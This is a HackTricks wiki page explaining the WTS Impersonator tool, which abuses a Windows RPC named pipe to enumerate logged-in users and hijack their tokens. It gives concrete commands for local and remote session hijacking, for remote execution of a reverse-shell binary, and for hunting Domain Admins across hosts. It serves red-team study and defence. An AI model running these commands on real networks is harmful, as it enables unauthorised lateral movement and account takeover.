4.3 KiB
Learn AWS hacking from zero to hero with htARTE (HackTricks AWS Red Team Expert)!
Other ways to support HackTricks:
- If you want to see your company advertised in HackTricks or download HackTricks in PDF Check the SUBSCRIPTION PLANS!
- Get the official PEASS & HackTricks swag
- Discover The PEASS Family, our collection of exclusive NFTs
- Join the 💬 Discord group or the telegram group or follow us on Twitter 🐦 @carlospolopm.
- Share your hacking tricks by submitting PRs to the HackTricks and HackTricks Cloud github repos.
The WTS Impersonator tool exploits the "\pipe\LSM_API_service" RPC Named pipe to stealthily enumerate logged-in users and hijack their tokens, bypassing traditional Token Impersonation techniques. This approach facilitates seamless lateral movements within networks. The innovation behind this technique is credited to Omri Baso, whose work is accessible on GitHub.
Core Functionality
The tool operates through a sequence of API calls:
WTSEnumerateSessionsA → WTSQuerySessionInformationA → WTSQueryUserToken → CreateProcessAsUserW
Key Modules and Usage
-
Enumerating Users: Local and remote user enumeration is possible with the tool, using commands for either scenario:
- Locally:
.\WTSImpersonator.exe -m enum
- Remotely, by specifying an IP address or hostname:
.\WTSImpersonator.exe -m enum -s 192.168.40.131
- Locally:
-
Executing Commands: The
exec
andexec-remote
modules require a Service context to function. Local execution simply needs the WTSImpersonator executable and a command:- Example for local command execution:
.\WTSImpersonator.exe -m exec -s 3 -c C:\Windows\System32\cmd.exe
- PsExec64.exe can be used to gain a service context:
.\PsExec64.exe -accepteula -s cmd.exe
- Example for local command execution:
-
Remote Command Execution: Involves creating and installing a service remotely similar to PsExec.exe, allowing execution with appropriate permissions.
- Example of remote execution:
.\WTSImpersonator.exe -m exec-remote -s 192.168.40.129 -c .\SimpleReverseShellExample.exe -sp .\WTSService.exe -id 2
- Example of remote execution:
-
User Hunting Module: Targets specific users across multiple machines, executing code under their credentials. This is especially useful for targeting Domain Admins with local admin rights on several systems.
- Usage example:
.\WTSImpersonator.exe -m user-hunter -uh DOMAIN/USER -ipl .\IPsList.txt -c .\ExeToExecute.exe -sp .\WTServiceBinary.exe
- Usage example:
Learn AWS hacking from zero to hero with htARTE (HackTricks AWS Red Team Expert)!
Other ways to support HackTricks:
- If you want to see your company advertised in HackTricks or download HackTricks in PDF Check the SUBSCRIPTION PLANS!
- Get the official PEASS & HackTricks swag
- Discover The PEASS Family, our collection of exclusive NFTs
- Join the 💬 Discord group or the telegram group or follow us on Twitter 🐦 @carlospolopm.
- Share your hacking tricks by submitting PRs to the HackTricks and HackTricks Cloud github repos.